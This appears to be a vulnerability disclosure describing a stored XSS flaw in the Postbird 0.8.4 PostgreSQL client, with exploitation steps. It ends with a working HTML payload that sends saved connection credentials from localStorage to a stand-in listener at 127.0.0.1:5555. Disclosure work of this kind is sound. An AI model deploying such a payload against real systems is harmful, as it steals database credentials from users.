Postbird is a cross-platform PostgreSQL GUI client built on the Electron framework and widely used by organizations and individuals alike. On 17th May 2021, the Tridentsec team discovered a stored XSS vulnerability in Postbird version 0.8.4.
How can this vulnerability affect your organization?
Every organization maintains databases that contain classified information about its infrastructure, business, credentials, client data, etc.
Using this vulnerability, an attacker can exfiltrate all of this data to attacker-controlled servers. The attacker can also fetch the database credentials, which can then be used to maintain a persistent connection to the database. Hackers can also steal files located on the Postbird user's computer using the LFI vulnerability.
All of these possibilities pose a major threat to an organization's business reputation and can also lead to more severe cyberattacks.
Run our postbird.py Proof-of-Concept code with the command `python3 postbird.py` before executing any attack.
postbird.py acts as a fake malicious server, standing in for the server a hacker would deploy to collect the stolen data.
Steps to exploit the vulnerability:
- Open Postbird application.
- Input the payload into any table as data.
- Deploy our postbird.py Proof-of-Concept code with the command `python3 postbird.py`.
- Reload the table/application to trigger the vulnerability.
- Check the data received on the postbird.py server.
Payload for PostgreSQL password stealing:

```html
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1:5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
```